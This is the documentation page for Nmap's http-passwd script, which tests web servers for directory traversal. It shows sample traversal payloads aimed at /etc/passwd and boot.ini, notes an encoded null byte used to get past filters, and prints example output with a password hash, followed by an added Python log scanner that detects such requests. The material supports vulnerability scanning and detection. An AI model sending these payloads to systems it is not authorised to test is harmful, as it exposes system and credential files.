File http-passwd

Script types: portrule
Categories: intrusive, vuln
Download: http://nmap.org/svn/scripts/http-passwd.nse

User Summary

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

The script uses several techniques:

  • Generic directory traversal by requesting paths like ../../../../etc/passwd.
  • Known specific traversals of several web servers.
  • Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in the path controlled by the script argument http-passwd.root.

Script Arguments

http-passwd.root

Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-passwd --script-args http-passwd.root=/test/ <target>

Script Output

80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "index.html?../../../../../boot.ini"
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect


80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: "../../../../../../../../../../etc/passwd"
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false
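
Seen from the server side, the requests described above leave recognizable traces in an access log. The following is an added example, not part of the Nmap documentation or of the script itself: a small log scanner that flags path traversal, query string traversal and the encoded null byte, including double-encoded dots. The log lines, function names and indicator labels are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2024:10:00:01 +0000] "GET /../../../../etc/passwd HTTP/1.1" 400 0',
    '192.0.2.66 - - [01/Jan/2024:10:00:02 +0000] "GET /test/index.html?../../../../../boot.ini%00 HTTP/1.1" 200 250',
    '192.0.2.66 - - [01/Jan/2024:10:00:03 +0000] "GET /%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /docs/release..notes.html HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
# ".." as a whole segment: after a separator, before a separator, NUL or end.
DOTDOT = re.compile(r"(?:^|[/\\?=&])\.\.(?:[/\\\x00]|$)")
TARGETS = ("etc/passwd", "boot.ini")  # files named in the script summary

def decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded dots (%252e) are normalised."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s

def classify(target):
    """Return the set of traversal indicators present in one request target."""
    raw_path, _, raw_query = target.partition("?")
    path, query = decode(raw_path), decode(raw_query)
    found = set()
    if DOTDOT.search(path):
        found.add("path-traversal")
    if DOTDOT.search("?" + query):
        found.add("query-traversal")
    if "\x00" in path + query:
        found.add("null-byte")
    if any(t in (path + "?" + query).replace("\\", "/").lower() for t in TARGETS):
        found.add("sensitive-file")
    return found

def scan(lines):
    """Return (target, status, indicators) for each log line showing an indicator."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and (found := classify(m.group(1))):
            hits.append((m.group(1), int(m.group(2)), found))
    return hits

if __name__ == "__main__":
    for target, status, found in scan(SAMPLE_LOG):
        print(status, sorted(found), target)
```

A flagged request answered with status 200 is the one to review first, since the script output above shows that a successful traversal returns the file contents in the response body.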

Requires


Author: Kris Katterjohn, Ange Gutek

License: Same as Nmap--See http://nmap.org/book/man-legal.html
